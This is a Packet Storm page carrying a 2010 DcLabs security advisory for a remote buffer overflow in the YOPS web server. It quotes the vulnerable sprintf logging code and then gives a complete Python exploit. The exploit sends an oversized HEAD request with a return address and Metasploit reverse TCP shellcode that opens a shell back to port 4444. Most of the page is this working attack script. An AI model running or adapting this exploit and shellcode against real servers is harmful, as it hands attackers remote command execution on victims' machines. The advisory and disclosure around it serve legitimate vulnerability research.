what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

YOPS Remote Command Execution

YOPS Remote Command Execution
Posted Sep 11, 2010
Authored by ipax | Site dclabs.com.br

YOPS (Your Own Personal [WEB] Server) version 2009-11-30 suffers from a remote buffer overflow vulnerability.

tags | exploit, remote, web, overflow
SHA-256 | 6694052f138560b7bda843c825debc8144e0312b513297460d9966fb3c62c18d

YOPS Remote Command Execution

Change Mirror Download
[DCA-00015]

[Software]

 - YOPS (Your Open Personal [WEB] Server)

[Vendor Product Description]

 - YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C. There are 7 stages (accept, parse,
launch, fetch, error, send and log), and pipes are used as interstage
channels.

[Bug Description]

 - In function http_parse_request_header the application fails to do a
boundary check for a malformed buffer received as a HTTP command
(HEAD/GET/POST), prior to use it as input for logger variable at
swebs_record_log function.

 --- http.c snippet ---
int http_parse_request_header(char *data, struct http_request_header *h)
{
       int r;
       int ver, rev;
       char *s, *tok, *l, *prm;
[...]
       r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
       if (r != 2)
               return -400;
[...]
}
 --- END snippet ---

 --- swebs.c snippet ---
int swebs_record_log(int log, JOB *job)
{
       int err;
       time_t now;
       char timestr[32];
       char logrec[MAX_REQUEST_LINE_LEN + 1];
[...]
       sprintf (
               logrec,
               "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
               job->client,
               timestr,
               job->hdr.request_line,
               job->response_hlen,
               job->response_blen_sent,
               job->response_blen,
               job->status
               );
[...]
}
 --- END snippet ---

[History]

 - Advisory sent to vendor on 08/26/2010

[Impact]

 - High (Remote Command Execution)

[Affected Version]

 - YOPS 2009-11-30

 - Prior versions may also be vulnerable

[Code]

#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br

HOST = "localhost"
PORT = 8888

import socket
import sys
import time

try:
BUFF_LEN = int(sys.argv[1])
except:
BUFF_LEN = 802
FIXUP_ADDR = "\x47\xce\x04\x08"

shellcode = (
# MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
"\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
"\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
"\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
"\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
"\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
"\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
"\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)


buffer = "HEAD "
buffer += "A"*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += " HTTP/1.1"

stackadjust = (
"\xcb" # instruction alignment
"\xbc\x69\x69\x96\xb0" # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + "\r\n\r\n"

print """
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""

print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
s.recv(1024)
except:
pass
s.close()

time.sleep(3)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()


--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close